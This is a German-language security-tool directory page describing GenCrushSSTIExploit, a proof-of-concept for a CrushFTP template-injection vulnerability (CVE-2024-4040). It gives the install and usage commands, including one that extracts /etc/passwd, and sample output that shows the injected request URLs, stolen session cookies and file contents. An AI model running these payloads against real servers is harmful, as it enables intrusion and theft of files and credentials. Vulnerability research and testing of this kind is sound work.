Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
GenCrushSSTIExploit — ist ein PoC für CVE-2024-4040 Tool zum Ausnutzen der SSTI-Schwachstelle in CrushFTP | Kitploit
Tools/GitHubGitHub/geniuszly/gencrushsstiexploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

ist ein PoC für CVE-2024-4040 Tool zum Ausnutzen der SSTI-Schwachstelle in CrushFTP

Repository anzeigen
81vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DE

GenCrushSSTIExploit ist ein PoC-Exploit-Tool, das auf die SSTI-Schwachstelle (Server-Side Template Injection) in CrushFTP CVE-2024-4040 abzielt. Dieses Tool demonstriert, wie diese Schwachstelle nur zu Bildungs- und ethischen Hacking-Zwecken ausgenutzt werden kann.

Funktionen

  • Stellt eine Sitzung mit dem CrushFTP-Server her, um Authentifizierungs-Cookies zu extrahieren.
  • Nutzt die SSTI-Schwachstelle aus, um Payloads einzuschleusen.
  • Versucht, die Authentifizierung zu umgehen und sensible Dateien vom Server zu extrahieren.
  • Verwendet rich für eine schöne und gestaltete Konsolenausgabe.

Haftungsausschluss

⚠️ Verwenden Sie dieses Tool verantwortungsbewusst! Es ist nur für Forschungs- und Bildungszwecke bestimmt. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Installation

Voraussetzungen

  • Python 3.7+
  • pip (Python-Paketinstallationsprogramm)
  • Repository klonen

    root@kitploit:~
    git clone https://github.com/geniuszly/GenCrushSSTIExploit
    cd GenCrushSSTIExploit
    

    Erforderliche Pakete installieren

    root@kitploit:~
    pip install -r requirements.txt
    

    Verwendung

    Grundlegender Befehl

    root@kitploit:~
    python GenCrushSSTIExploit.py -t <ZIEL_URL>
    
    • -t / --target: Gibt die Ziel-URL des anfälligen CrushFTP-Servers an.

    Optionale Parameter

    • -l / --lfi: Lokales Datei-Einschließen. Gibt die Datei an, die extrahiert werden soll.
    • -w / --wordlist: Gibt eine Wortliste zum Brute-Forcen von Dateipfaden an.

    Beispiel

    root@kitploit:~
    python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
    

    Beispielausgabe

    root@kitploit:~
    ★ Добро пожаловать в GenCrushSSTIExploit ★
    CrushFTP SSTI PoC (CVE-2024-4040)
    Автор: geniuszly
    Использование: только для учебных и этических целей
    --------------------------------------------------
    
    [*] Подключение к ServerSessionAJAX...
    
    [+] Успешно подключено к ServerSessionAJAX
    [+] Куки CrushAuth: abc123def456ghi789
    [+] Куки currentAuth: xyz987
    
    [*] Попытка эксплуатации уязвимости SSTI...
    
    [+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
    
    [+] Успешная эксплуатация уязвимости SSTI
    [+] Ответ сервера: Hostname: example.com
    
    [*] Попытка обхода аутентификации...
    
    [+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
    
    [+] Обход аутентификации успешен
    [+] Извлечение /etc/passwd...
    [+] Успешное извлечение /etc/passwd
    [+] Извлеченное содержимое:
    root:x:0:0:root:/root:/bin/bash
    ...
    
    Tool herunterladen